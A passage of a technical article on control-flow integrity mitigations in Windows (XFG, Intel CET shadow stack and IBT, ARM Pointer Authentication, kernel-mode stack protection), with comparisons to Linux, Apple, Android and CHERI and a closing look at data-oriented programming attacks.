&lt;p&gt;Translation: on Insider Preview builds, the OS-side coverage is high (effectively all of &lt;code&gt;System32&lt;/code&gt;), but the 14% gap on executables outside the system directory is in third-party code that has not adopted &lt;code&gt;/guard:xfg&lt;/code&gt;. The geometric-mean equivalence class of 1.37 means the hash narrows the legal target set dramatically -- a typical XFG-protected call site is followed by one or two prototype-matching candidates rather than the thousands an unrefined CFG bitmap would admit.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;File class&lt;/th&gt;
&lt;th&gt;CFG (unprotected)&lt;/th&gt;
&lt;th&gt;XFG (coverage)&lt;/th&gt;
&lt;th&gt;PA (coverage)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Executables (Windows 11 x64 Insider 23440)&lt;/td&gt;
&lt;td&gt;2.68%&lt;/td&gt;
&lt;td&gt;85.73%&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DLLs (Windows 11 x64 Insider 23440)&lt;/td&gt;
&lt;td&gt;2.62%&lt;/td&gt;
&lt;td&gt;85.70%&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;C:\Windows\System32&lt;/code&gt; DLLs (x64)&lt;/td&gt;
&lt;td&gt;0.91%&lt;/td&gt;
&lt;td&gt;97.04%&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Combined (Windows 11 x64 Insider 23440)&lt;/td&gt;
&lt;td&gt;2.63%&lt;/td&gt;
&lt;td&gt;85.70%&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows 11 ARM64 Insider Preview build 23419&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;92%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Source: Becker et al., USENIX WOOT 2024, Table 4 and §5.3 [@woot24-becker-pdf].&lt;/p&gt;

eXtended Control Flow Guard (XFG) was an attempt to address this. XFG was never fully instrumented (UM/KM) and is now deprecated.
-- Connor McGarr, *Out of Control*, Black Hat USA 2025 [@mcgarr-bhusa25-deck-primary]
&lt;p&gt;The retrospective verdict came in August 2025. McGarr&apos;s Black Hat USA 2025 deck names XFG as &quot;never fully instrumented (UM/KM) and is now deprecated&quot; [@mcgarr-bhusa25-deck-primary].&lt;/p&gt;
&lt;p&gt;The reason Microsoft de-prioritised XFG is not documented by Microsoft. The most defensible reading, consistent with the public timeline, is this: once Intel CET silicon arrived in September 2020, hardware CFI on the &lt;em&gt;backward&lt;/em&gt; edge -- the territory software CFG and XFG never touched -- became the strategic priority. XFG was the right answer to COOP. It was also a software answer to a problem the silicon was about to absorb. By the time Tiger Lake taped out, Microsoft was already pivoting.&lt;/p&gt;
&lt;h3&gt;4.3 Generation 2: Intel CET, Shadow Stack and Indirect Branch Tracking&lt;/h3&gt;
&lt;p&gt;Intel published document 334525-001, &lt;em&gt;Control-Flow Enforcement Technology Specification&lt;/em&gt;, Revision 1.0, in June 2016 -- four years before any silicon shipped [@wiki-shadow-stack]. The specification defines two independent components. SHSTK is the Shadow Stack, the backward-edge piece. IBT is Indirect Branch Tracking, the forward-edge piece. They are siblings, not parent and child. Tiger Lake (11th Gen Intel Core Mobile) shipped on September 2, 2020 as the first commercial silicon with both [@wiki-tiger-lake]. AMD Zen 3 (Ryzen 5000 &quot;Vermeer&quot; and Epyc 7003 &quot;Milan&quot;) shipped a compatible implementation on November 5, 2020 [@wiki-zen-3]. The two-vendor consensus locked in.&lt;/p&gt;

A CPU-managed second stack of return addresses, write-protected by a CET-specific page-table bit. On `call`, the CPU pushes the return address onto both the regular stack and the shadow stack. On `ret`, it pops both, compares, and raises a `#CP` (Control Protection) exception on mismatch. Only the privileged instructions `WRSS` (CPL 0) and `WRUSS` (CPL 0 with user-class access) can legitimately mutate shadow-stack contents. Software shadow stacks predated CET (StackShield 1998, RAD 2001, SmashGuard 2006), but all of them stored the second stack at user privilege where an attacker with an arbitrary-write primitive could forge it. SHSTK is the first widely-deployed shadow stack with hardware-rooted integrity [@wiki-shadow-stack].

The forward-edge half of Intel CET. Every legal indirect-branch target must begin with `ENDBR64` (on x86-64) or `ENDBR32` (on x86). The CPU maintains a per-mode tracker state machine: an indirect call or indirect jump transitions the tracker out of `IDLE`, and the next instruction at the branch target must be `ENDBR64` to transition it back; any other instruction raises `#CP` [@felix-endbr64]. `ENDBR64` is a no-op for direct execution paths, so it is safe to sprinkle at the entry of every address-taken function. IBT first shipped in the Tiger Lake generation [@wiki-ibt]. As of May 2026, Windows enables only SHSTK; IBT is documented in the architecture but is not turned on by the OS [@mcgarr-bhusa25-deck-primary].

flowchart TD
    A[Intel CET] --&amp;gt; B[SHSTK&lt;br /&gt;Shadow Stack&lt;br /&gt;backward edge]
    A --&amp;gt; C[IBT&lt;br /&gt;Indirect Branch Tracking&lt;br /&gt;forward edge]
    B --&amp;gt; D[CPU pushes return address on call]
    B --&amp;gt; E[CPU compares on ret]
    B --&amp;gt; F[#CP fault on mismatch]
    C --&amp;gt; G[ENDBR64 required at indirect-branch target]
    C --&amp;gt; H[CPU tracker state machine]
    C --&amp;gt; I[#CP fault on non-ENDBR target]
    B -.-&amp;gt; J[Windows enforces this]
    C -.-&amp;gt; K[Windows does not enforce this]
&lt;p&gt;The SHSTK mechanism is direct. On &lt;code&gt;call&lt;/code&gt;, the CPU pushes the return address to both the regular stack and the shadow stack. On &lt;code&gt;ret&lt;/code&gt;, it pops from both and compares. Mismatch raises &lt;code&gt;#CP&lt;/code&gt; -- the Control Protection exception, vector 21.&lt;/p&gt;
&lt;p&gt;The shadow stack lives on pages marked with a CET-specific page-table bit; an ordinary &lt;code&gt;mov&lt;/code&gt; to those pages faults. Two privileged instructions are the only legitimate way to write to a shadow stack: &lt;code&gt;WRSS&lt;/code&gt; requires CPL 0 (kernel mode), and &lt;code&gt;WRUSS&lt;/code&gt; requires CPL 0 &lt;em&gt;with user-class access&lt;/em&gt; [@felix-wrss] [@felix-wruss]. The instruction family rounds out with &lt;code&gt;INCSSP&lt;/code&gt; for unwinding the shadow-stack pointer, &lt;code&gt;RDSSP&lt;/code&gt; for reading it, and &lt;code&gt;SAVEPREVSSP&lt;/code&gt; / &lt;code&gt;RSTORSSP&lt;/code&gt; for context-switch primitives [@felix-incssp] [@felix-rdssp].The &lt;code&gt;WRUSS&lt;/code&gt; privilege oddity is worth pausing on. The instruction can only execute when CPL is 0, but the processor treats its shadow-stack access as a &lt;em&gt;user-class&lt;/em&gt; access for the purpose of page-permission checks: &quot;The WRUSS instruction can be executed only if CPL = 0, however the processor treats its shadow-stack accesses as user accesses&quot; [@felix-wruss]. That carve-out is what lets the kernel implement SEH unwinding and &lt;code&gt;longjmp&lt;/code&gt; over a user shadow stack without violating the userspace memory model.&lt;/p&gt;
&lt;p&gt;Windows integration begins where the silicon ends. The Microsoft Tech Community post &lt;em&gt;Understanding Hardware-enforced Stack Protection&lt;/em&gt;, published on March 24, 2020 (six months before Tiger Lake shipped), announced the plumbing [@ms-hsp-techcommunity]. The &lt;code&gt;#CP&lt;/code&gt; fault is delivered to user mode as &lt;code&gt;STATUS_STACK_BUFFER_OVERRUN&lt;/code&gt; -- the same status code CFG fast-fails use, with a CET-specific subcode that lets debuggers distinguish the two.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;/CETCOMPAT&lt;/code&gt; linker flag, available beginning in Visual Studio 2019 and exposed in the GUI in version 16.7, sets &lt;code&gt;IMAGE_DLLCHARACTERISTICS_EX_CET_COMPAT&lt;/code&gt; in the PE header [@ms-learn-cetcompat]. The loader uses this bit to decide whether to enforce shadow-stack faults in &lt;em&gt;strict&lt;/em&gt; mode (fatal on any binary) or &lt;em&gt;compatibility&lt;/em&gt; mode (fatal only on &lt;code&gt;/CETCOMPAT&lt;/code&gt;-marked modules).&lt;/p&gt;
&lt;p&gt;The per-process policy lives in a ten-single-bit-field struct named &lt;code&gt;PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY&lt;/code&gt; [@ms-learn-shadow-stack-policy]. The fields are, in declared order: &lt;code&gt;EnableUserShadowStack&lt;/code&gt;, &lt;code&gt;AuditUserShadowStack&lt;/code&gt;, &lt;code&gt;SetContextIpValidation&lt;/code&gt;, &lt;code&gt;AuditSetContextIpValidation&lt;/code&gt;, &lt;code&gt;EnableUserShadowStackStrictMode&lt;/code&gt;, &lt;code&gt;BlockNonCetBinaries&lt;/code&gt;, &lt;code&gt;BlockNonCetBinariesNonEhcont&lt;/code&gt;, &lt;code&gt;AuditBlockNonCetBinaries&lt;/code&gt;, &lt;code&gt;CetDynamicApisOutOfProcOnly&lt;/code&gt;, and &lt;code&gt;SetContextIpValidationRelaxedMode&lt;/code&gt;, followed by &lt;code&gt;ReservedFlags : 22&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The default state on Windows 11 24H2 on CET-capable hardware is &lt;code&gt;EnableUserShadowStack = TRUE&lt;/code&gt; in &lt;em&gt;compatibility mode&lt;/em&gt;, meaning the shadow stack is active for every process but the fault is fatal only when the unwinding instruction is in a &lt;code&gt;/CETCOMPAT&lt;/code&gt;-marked module. Strict mode is opt-in.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Policy bit&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;EnableUserShadowStack&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Master switch. TRUE enables HSP for the process in compatibility mode.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;AuditUserShadowStack&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Log shadow-stack violations rather than fast-failing. Used for canary builds.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SetContextIpValidation&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Closes the &lt;code&gt;SetThreadContext&lt;/code&gt;-via-CET-bypass carve-out by validating the IP write.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;AuditSetContextIpValidation&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Audit-mode variant of the above.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;EnableUserShadowStackStrictMode&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Fault is fatal in every module, not just &lt;code&gt;/CETCOMPAT&lt;/code&gt;-marked ones.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;BlockNonCetBinaries&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Refuse to load any module without &lt;code&gt;IMAGE_DLLCHARACTERISTICS_EX_CET_COMPAT&lt;/code&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;BlockNonCetBinariesNonEhcont&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Same as above but exempts modules with EH continuation metadata.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;AuditBlockNonCetBinaries&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Audit-mode variant of &lt;code&gt;BlockNonCetBinaries&lt;/code&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CetDynamicApisOutOfProcOnly&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;JIT shadow-stack APIs must be invoked from a different process.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SetContextIpValidationRelaxedMode&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Loosens &lt;code&gt;SetContextIpValidation&lt;/code&gt; for compatibility with older debuggers.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Critically, McGarr&apos;s BHUSA 2025 deck states verbatim: &quot;Windows only uses the Shadow Stack feature of CET&quot; [@mcgarr-bhusa25-deck-primary]. IBT is documented in the CPU and required by GCC&apos;s &lt;code&gt;-fcf-protection=full&lt;/code&gt; on Linux, but Windows turns it off. The forward edge on Windows in 2026 is still a software story.&lt;/p&gt;
&lt;p&gt;Hardware closes the backward edge. But the forward edge is still in software, and the kernel-mode story is still off by default. Why?&lt;/p&gt;
&lt;h2&gt;5. Hardware-Enforced Backward-Edge Protection&lt;/h2&gt;
&lt;p&gt;The shadow stack is not a new idea. The Wikipedia &lt;em&gt;Shadow stack&lt;/em&gt; article documents three software-shadow-stack ancestors before Intel CET [@wiki-shadow-stack]. StackShield shipped in 1998. Return Address Defender (RAD) followed in 2001. SmashGuard arrived in 2006. Each kept a parallel stack of return addresses and compared the popped value at &lt;code&gt;ret&lt;/code&gt;. Each paid one of two costs: per-call overhead from the compare-and-branch check, or a second stack at &lt;em&gt;user&lt;/em&gt; privilege where an attacker with an arbitrary-write primitive could overwrite the shadow copy along with the regular one.&lt;/p&gt;
&lt;p&gt;StackShield (1998), RAD (2001), SmashGuard (2006), LLVM &lt;code&gt;-fsanitize=shadow-call-stack&lt;/code&gt;. Every software shadow stack before CET lived at user privilege; the cost of integrity was either runtime overhead or a register reservation an attacker could subvert.&lt;/p&gt;
&lt;p&gt;What does the CPU give you that the compiler cannot? Three things, in declining order of structural significance.&lt;/p&gt;
&lt;p&gt;First, a page-table attribute the CPU itself enforces. Shadow-stack pages are marked SHSTK in the page table. A regular &lt;code&gt;mov&lt;/code&gt; to those pages faults, no matter how clever the attacker&apos;s write primitive is.&lt;/p&gt;
&lt;p&gt;The privileged-write surface is exactly two instructions, &lt;code&gt;WRSS&lt;/code&gt; and &lt;code&gt;WRUSS&lt;/code&gt;, and both are CPL-0-only. Compatibility for existing C and C++ unwind paths -- SEH on Windows, &lt;code&gt;setjmp&lt;/code&gt;/&lt;code&gt;longjmp&lt;/code&gt; in the C runtime, C++ exception unwinding -- routes through these privileged instructions, called by the kernel on behalf of user-mode code that needs to legitimately rewind the shadow stack. The shadow stack is, structurally, a piece of CPU state that user code cannot mutate at all.&lt;/p&gt;

A `longjmp` is a long jump: control transfers across multiple stack frames in a single instruction. The C runtime saves a `jmp_buf` containing the stack pointer, the instruction pointer, and the register file, and `longjmp` restores them. On a CET-equipped system, the regular stack pointer is restored normally but the shadow stack pointer must also rewind by the same number of frames. SEH unwinding poses the same problem: when a structured exception handler dispatches, the runtime walks the SEH chain and unwinds the stack one frame at a time. Both paths require legitimately popping multiple shadow-stack entries in a single sequence. Intel solved this with `INCSSP` for the trivial unwind case (advance the shadow-stack pointer by a count of frames) and with `WRUSS` for the harder case where the kernel needs to write specific values back onto a user shadow stack. The engineering work to make every existing unwind path CET-compatible occupied compiler teams and C-runtime maintainers for the better part of two years between 2018 and 2020 [@felix-incssp] [@felix-wruss].
&lt;p&gt;Second, a single CPU-visible event at the moment of mismatch. The compare-and-branch sequence that software shadow stacks emit takes multiple instructions, each of which can be raced by a concurrent attacker thread that wins the window between the compare and the trap. The CET &lt;code&gt;ret&lt;/code&gt; instruction performs the compare and raises &lt;code&gt;#CP&lt;/code&gt; atomically; there is no user-visible instruction between the comparison and the fault. The CPU enforces the invariant; user code cannot race it.&lt;/p&gt;
&lt;p&gt;Third, performance. Intel and Microsoft both characterise shadow-stack overhead as single-digit percent on typical workloads [@intel-cet-technical-look], with Microsoft&apos;s &lt;em&gt;Understanding Hardware-enforced Stack Protection&lt;/em&gt; announcement describing the cost as negligible [@ms-hsp-techcommunity]. WOOT 2024 measures below 2% on production workloads and 3% to 8% on micro-benchmarks [@woot24-becker-pdf]. Software shadow stacks, by contrast, typically pay 5% to 10% on &lt;code&gt;call&lt;/code&gt;-heavy workloads plus a memory cost the hardware version does not.&lt;/p&gt;

flowchart TD
    A[User-mode mov to SHSTK page] --&amp;gt;|page-table SHSTK bit| B[Faults]
    C[Compiler-emitted call/ret] --&amp;gt;|hardware push/pop| D[Shadow stack pointer updated]
    E[longjmp] --&amp;gt; F[INCSSP advances SSP]
    E --&amp;gt; G[Kernel may invoke WRUSS]
    H[SEH unwind] --&amp;gt; G
    G --&amp;gt; I[Shadow stack legitimately rewound]
    J[Kernel] --&amp;gt;|CPL 0 only| K[WRSS writes shadow stack]
&lt;p&gt;The atomicity argument is the structural one. The performance is the marketing one. The page-table attribute is the security one. Together they explain why hardware backward-edge protection is a generational step on Windows rather than an incremental improvement on the shadow-stack lineage.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Shadow stack is the first time Windows has had a backward-edge story. Every prior Windows mitigation -- /GS, DEP, ASLR, SafeSEH, CFG, XFG -- treated &lt;code&gt;ret&lt;/code&gt; either as something to guard a single frame around (the &lt;code&gt;/GS&lt;/code&gt; cookie) or as something to ignore. The forward-edge story is still in software. The asymmetry matters.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So what is the state in 2026?&lt;/p&gt;
&lt;h2&gt;6. CFI on Windows in 2026&lt;/h2&gt;
&lt;p&gt;A snapshot of every CFI surface currently shipping. On a freshly-installed Windows 11 24H2 box, the operational picture stitches together cleanly into four layers.&lt;/p&gt;
&lt;h3&gt;6.1 User-mode Hardware-enforced Stack Protection&lt;/h3&gt;
&lt;p&gt;User-mode HSP is default-on for &lt;code&gt;/CETCOMPAT&lt;/code&gt;-marked binaries on CET-capable hardware, announced by Microsoft in March 2020 [@ms-hsp-techcommunity]. Compatibility mode is the default; strict mode is opt-in via &lt;code&gt;EnableUserShadowStackStrictMode&lt;/code&gt; [@ms-learn-shadow-stack-policy]. The minimum supported client is Windows 10 version 2004 (build 19041), which means every supported consumer Windows release of the last six years has the API surface. The &lt;code&gt;SetContextIpValidation&lt;/code&gt; bit is the load-bearing addition; it closes the &lt;code&gt;SetThreadContext&lt;/code&gt;-via-CET-bypass carve-out by validating that any IP write through &lt;code&gt;SetThreadContext&lt;/code&gt; targets a CET-instrumented landing.&lt;/p&gt;
&lt;h3&gt;6.2 Kernel-mode Hardware-enforced Stack Protection&lt;/h3&gt;
&lt;p&gt;Kernel-mode HSP is &lt;strong&gt;off&lt;/strong&gt; by default on Windows 11 24H2 and Windows Server 2025. The Microsoft Learn primary states the prerequisite list verbatim: &quot;Windows 11 2022 update or newer; 11th Gen Intel Core Mobile processors and AMD Zen 3 Core (and newer); Virtualization-based security (VBS) and Hypervisor-enforced code integrity (HVCI) are enabled&quot; [@ms-learn-kernel-hsp]. Activation is via Windows Security under Device Security and Core Isolation, or via Group Policy.&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;HVCI&lt;/a&gt; prerequisite is non-negotiable: kernel-mode HSP relies on the hypervisor to enforce the write-protected page-table bit on shadow-stack pages, because the same NT kernel an attacker would compromise is the one that would otherwise own those mappings.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Microsoft Learn page for Kernel-mode Hardware-enforced Stack Protection states explicitly: &quot;Kernel-mode Hardware-enforced Stack Protection is off by default, but customers can turn it on if the prerequisites are met&quot; [@ms-learn-kernel-hsp]. This is a load-bearing correction to a common misconception. Even on hardware that supports CET, kernel ROP is &lt;em&gt;not&lt;/em&gt; mitigated by default. The opt-in surface requires VBS plus HVCI plus an explicit user action.&lt;/p&gt;
&lt;/blockquote&gt;

flowchart TD
    A[11th Gen Intel Core Mobile or AMD Zen 3 or newer] --&amp;gt; B[Windows 11 2022 update or newer]
    B --&amp;gt; C[Virtualization-based Security enabled]
    C --&amp;gt; D[Hypervisor-enforced Code Integrity enabled]
    D --&amp;gt; E[User opt-in via Windows Security or Group Policy]
    E --&amp;gt; F[Kernel-mode HSP active]
    A -.-&amp;gt;|missing| G[Silent no-op]
    C -.-&amp;gt;|missing| G
    E -.-&amp;gt;|missing| G
&lt;p&gt;Synacktiv&apos;s SSTIC 2025 paper, &lt;em&gt;Analyzing the Windows kernel shadow stack mitigation&lt;/em&gt; by Remi Jullian and Alexandre Aulnette of Synacktiv&apos;s reverse-engineering team, is the canonical practitioner reference for the kernel-mode implementation [@synacktiv-sstic25]. The paper walks the hypervisor calls, the &lt;code&gt;KscpCfgDispatchUserCallTargetEs*&lt;/code&gt; functions named in McGarr&apos;s BHUSA 2025 deck, and the bypass surfaces a researcher should look at first.&lt;/p&gt;
&lt;h3&gt;6.3 Pointer Authentication on Windows-on-ARM&lt;/h3&gt;
&lt;p&gt;Windows on ARM ships ARMv8.3-A Pointer Authentication. The mechanism is different in detail from CET but parallel in role: a small cryptographic MAC over a 64-bit pointer, computed and stripped by dedicated instructions. McGarr&apos;s 2023 &lt;em&gt;Windows ARM64 Internals: Deconstructing Pointer Authentication&lt;/em&gt; writeup is the practitioner reference [@mcgarr-windows-pac]. The exact quote from the post nails the scope: &quot;Windows currently only uses PAC for &apos;instruction pointers&apos; ... and it also it only uses &apos;key B&apos; for cryptographic signatures and, therefore, loads the target pointer signing value into the &lt;code&gt;APIBKeyLo_EL1&lt;/code&gt; and &lt;code&gt;APIBKeyHi_EL1&lt;/code&gt; AArch64 system registers.&quot;&lt;/p&gt;

An ARMv8.3-A feature in which 64-bit pointers carry a small cryptographic MAC in unused upper bits, generated and verified by dedicated `PACI*`, `AUTI*`, and `XPAC*` instructions. The Windows-on-ARM loader uses `PACIBSP` to sign the return address on function entry, `AUTIBSP` to verify it on exit, and `XPACLRI` to strip the MAC for debug-print paths. Windows uses key B (`APIBKeyLo_EL1`/`APIBKeyHi_EL1`) for instruction-pointer signing; the kernel-managed key is derived by `OslPrepareTarget` via `SymCryptRngAesGenerate` at boot [@mcgarr-windows-pac].
&lt;p&gt;The &lt;code&gt;LOADER_PARAMETER_EXTENSION.PointerAuthKernelIpEnabled&lt;/code&gt; bit controls activation; &lt;code&gt;PointerAuthKernelIpKey&lt;/code&gt; holds the kernel-managed key. The instruction triple &lt;code&gt;PACIBSP&lt;/code&gt; / &lt;code&gt;AUTIBSP&lt;/code&gt; / &lt;code&gt;XPACLRI&lt;/code&gt; is sprinkled at function entry, exit, and debug-print paths respectively. WOOT 2024 measured 92% PA file coverage on Windows 11 ARM64 Insider Preview developer build 23419 [@woot24-becker-pdf]. The structural answer to backward-edge integrity on ARM is therefore PAC, not a shadow stack -- and Windows-on-ARM gets that protection by default on Snapdragon X Elite and X Plus machines.&lt;/p&gt;
&lt;h3&gt;6.4 Coverage in production&lt;/h3&gt;
&lt;p&gt;The WOOT 2024 measurements summarise the operational picture cleanly. CFG coverage on Windows 11 Insider Preview developer build 23440 is 97.37% of x64 PE files, 99.09% on &lt;code&gt;System32&lt;/code&gt;; XFG coverage is 85.7% on PE files, 97.0% on &lt;code&gt;System32&lt;/code&gt;; PA coverage on the Windows 11 ARM64 Insider Preview developer build 23419 is 92% [@woot24-becker-pdf]. CET shadow-stack adoption tracks the &lt;code&gt;/CETCOMPAT&lt;/code&gt; linker flag&apos;s penetration across the OS surface; on the system DLLs in 24H2 it is at or near total. Translation: on a modern Windows 11 system, control-flow protection is almost-everywhere in the OS, and opt-in on user applications.&lt;/p&gt;
&lt;p&gt;Almost everything in Windows itself is protected. The third-party-app and JIT-runtime surfaces are not. And the question of what to do about COOP, now that XFG is deprecated, is genuinely open.&lt;/p&gt;
&lt;h2&gt;7. How Other Platforms Solve the Same Problem&lt;/h2&gt;
&lt;p&gt;Step outside Windows for a moment. What does Linux do? What does Apple do? What does Android do?&lt;/p&gt;
&lt;p&gt;Linux&apos;s answer is kCFI. The &lt;code&gt;-fsanitize=cfi-icall&lt;/code&gt; flag, originally an LLVM jump-table forward-edge CFI, shipped in Linux 5.13 in June 2021. The replacement design, &lt;code&gt;-fsanitize=kcfi&lt;/code&gt;, shipped in Linux 6.1 in December 2022 [@lwn-kcfi]. The mechanism is a 32-bit prototype hash placed before each function entry, padded with &lt;code&gt;INT3&lt;/code&gt; instructions to keep the hash bytes from becoming a useful gadget.&lt;/p&gt;
&lt;p&gt;Jonathan Corbet&apos;s LWN writeup describes the design: &quot;When code is compiled with -fsanitize=kcfi, the entry point to each function is preceded by a 32-bit value representing the prototype of that function. This value is (part of) a hash calculated from the C++ mangled name for the function and its arguments.&quot; kCFI is the design point XFG was peer to. It shipped, was documented, and remains supported.&lt;/p&gt;
&lt;p&gt;Sami Tolvanen of Google&apos;s Android kernel team is the patch-series author for Linux kCFI. His earlier &lt;code&gt;-fsanitize=cfi-icall&lt;/code&gt; work in LLVM landed first.&lt;/p&gt;
&lt;p&gt;Apple&apos;s answer is PAC, deployed by default on every Apple Silicon Mac (since the M1 in November 2020) and on every iOS device since the A12 in 2018 [@apple-platform-security]. The hardened runtime plus the &lt;code&gt;com.apple.security.cs.allow-jit&lt;/code&gt; entitlement is the declarative JIT story, because PAC interacts badly with code generation that wants to sign and verify its own pointers; Apple&apos;s solution was to require an explicit entitlement for any process that wants JIT capability and to enforce a separate W^X policy on JIT memory [@apple-dev-allow-jit].&lt;/p&gt;
&lt;p&gt;Android&apos;s answer is ARMv8.5-A Memory Tagging Extension on Pixel 8 and later [@source-android-mte]. MTE is adjacent to CFI rather than within its design space: a tagged-allocator scheme that catches use-after-free and out-of-bounds memory accesses at hardware speed, before they corrupt a control-flow target in the first place. MTE complements PAC; it does not replace it.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;Forward edge&lt;/th&gt;
&lt;th&gt;Backward edge&lt;/th&gt;
&lt;th&gt;Memory safety adjuncts&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Windows 11 x86-64&lt;/td&gt;
&lt;td&gt;CFG (default); XFG (Insider, deprecated)&lt;/td&gt;
&lt;td&gt;CET Shadow Stack (default-on user mode)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows 11 ARM64&lt;/td&gt;
&lt;td&gt;-- (no forward-edge CFI documented; PAC is backward)&lt;/td&gt;
&lt;td&gt;ARMv8.3 PAC, key B&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux mainline&lt;/td&gt;
&lt;td&gt;&lt;code&gt;-fsanitize=cfi-icall&lt;/code&gt; (LTO jump tables) / kCFI hash&lt;/td&gt;
&lt;td&gt;LLVM software shadow-call-stack; CET on x86-64&lt;/td&gt;
&lt;td&gt;&lt;code&gt;-fcf-protection=full&lt;/code&gt; (CET); MTE on ARM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS / iOS&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;ARMv8.3 PAC&lt;/td&gt;
&lt;td&gt;Hardened runtime; W^X JIT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Android (Pixel 8+)&lt;/td&gt;
&lt;td&gt;LLVM CFI&lt;/td&gt;
&lt;td&gt;ARMv8.3 PAC&lt;/td&gt;
&lt;td&gt;ARMv8.5 MTE (tagged allocator)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CHERI / CHERIoT&lt;/td&gt;
&lt;td&gt;Capability-bound pointers (all edges)&lt;/td&gt;
&lt;td&gt;Capability-bound return addresses&lt;/td&gt;
&lt;td&gt;128-bit hardware capabilities&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The capability-hardware future is CHERI -- Capability Hardware Enhanced RISC Instructions -- and its embedded sibling CHERIoT. The structural shift CHERI makes is to encode 128-bit hardware capabilities into the pointer itself: every pointer carries provenance, bounds, and permissions, all enforced by the CPU. A capability cannot be forged, narrowed beyond its grant, or reused after revocation. Pointer integrity is enforced at the silicon, not at the call site [@cheri-cambridge]. Microsoft Research&apos;s Project Snowflake explores the same design space [@msr-snowflake].&lt;/p&gt;
&lt;p&gt;Three platforms, three answers. None is a complete answer. To understand why, we have to look at the bug class no CFI variant can close.&lt;/p&gt;
&lt;h2&gt;8. What CFI Cannot Close&lt;/h2&gt;
&lt;p&gt;Hong Hu and his coauthors at the National University of Singapore published &lt;em&gt;Data-Oriented Programming: On the Expressiveness of Non-Control Data Attacks&lt;/em&gt; at IEEE Symposium on Security and Privacy in May 2016 [@hu-2016-dop]. The paper&apos;s abstract is the load-bearing observation: &quot;In this paper we show that such attacks are Turing-complete. We present a systematic technique called data-oriented programming (DOP) to construct expressive non-control data exploits for arbitrary x86 programs. ... 8 out of 9 real-world programs have gadgets to simulate arbitrary computations and 2 of them are confirmed to be able to build Turing-complete attacks. All the attacks work in the presence of ASLR and DEP.&quot;&lt;/p&gt;
&lt;p&gt;The structural point is what makes DOP devastating to the CFI design space. A DOP attack never violates the static control-flow graph. The attacker chains short non-control-data corruptions -- writes to variables, flags, configuration values, never to a code pointer -- and computes inside the program&apos;s legitimate control flow.&lt;/p&gt;
